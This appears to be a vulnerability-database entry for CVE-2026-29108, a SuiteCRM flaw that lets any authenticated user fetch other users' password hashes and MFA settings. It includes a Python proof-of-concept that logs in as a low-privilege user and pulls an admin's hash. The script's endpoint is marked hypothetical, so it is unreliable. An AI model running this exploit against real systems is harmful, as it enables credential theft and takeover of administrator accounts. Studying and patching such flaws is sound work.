Security Vulnerability Report
CVE-2026-29108 CVSS 6.5 MEDIUM

CVE-2026-29108

Published: 2026-03-20 00:16:16
Last Modified: 2026-03-23 16:49:26

Description

SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to version 8.9.3, an authenticated API endpoint allows any user to retrieve detailed information about any other user, including their password hash, username, and MFA configuration. Because any authenticated user can query this endpoint, it is possible to retrieve and potentially crack the passwords of administrative users. Version 8.9.3 patches the issue.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE
SuiteCRM < 8.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Configuration
target_url = "http://example-suitecrm.com"
login_api = f"{target_url}/api/access"
vulnerable_api = f"{target_url}/api/v8/Users/{{user_id}}"  # Hypothetical endpoint based on description
attacker_credentials = {
    "username": "low_priv_user",
    "password": "password123",
}


def exploit():
    session = requests.Session()

    # Step 1: Authenticate as a low-privilege user
    print("[+] Logging in as low-privilege user...")
    auth_resp = session.post(login_api, json=attacker_credentials)
    if auth_resp.status_code != 200:
        print("[-] Login failed")
        return
    print("[+] Login successful")

    # Step 2: Query the vulnerable endpoint for the admin user (ID=1 usually)
    target_id = 1
    print(f"[+] Attempting to fetch details for User ID: {target_id}")
    # The vulnerability allows any authenticated user to query any ID
    exploit_resp = session.get(vulnerable_api.format(user_id=target_id))
    if exploit_resp.status_code == 200:
        data = exploit_resp.json()
        print("[+] Exploit successful! Leaked data:")
        print(f"    Username: {data.get('user_name')}")
        print(f"    Password Hash: {data.get('user_hash')}")
        print(f"    MFA Config: {data.get('mfa_config')}")
    else:
        print("[-] Exploit failed or endpoint patched.")


if __name__ == "__main__":
    exploit()
```

References

https://github.com/SuiteCRM/SuiteCRM-Core/security/advisories/GHSA-xc8w-xc9v-45w5 (Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-29108", "sourceIdentifier": "[email protected]", "published": "2026-03-20T00:16:15.983", "lastModified": "2026-03-23T16:49:25.540", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 8.9.3, an authenticated API endpoint allows any user to retrieve detailed information about any other user, including their password hash, username, and MFA configuration. As any authenticated user can query this endpoint, it's possible to retrieve and potentially crack the passwords of administrative users. Version 8.9.3 patches the issue."}, {"lang": "es", "value": "SuiteCRM es una aplicación de software de Gestión de Relaciones con Clientes (CRM) de código abierto y lista para empresas. Antes de las versiones 8.9.3, un endpoint de API autenticado permite a cualquier usuario recuperar información detallada sobre cualquier otro usuario, incluyendo su hash de contraseña, nombre de usuario y configuración de MFA. Dado que cualquier usuario autenticado puede consultar este endpoint, es posible recuperar y potencialmente descifrar las contraseñas de los usuarios administrativos. La versión 8.9.3 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.9.3", "matchCriteriaId": "CD824E64-58E0-472C-84CB-6729B4B791DF"}]}]}], "references": [{"url": "https://github.com/SuiteCRM/SuiteCRM-Core/security/advisories/GHSA-xc8w-xc9v-45w5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```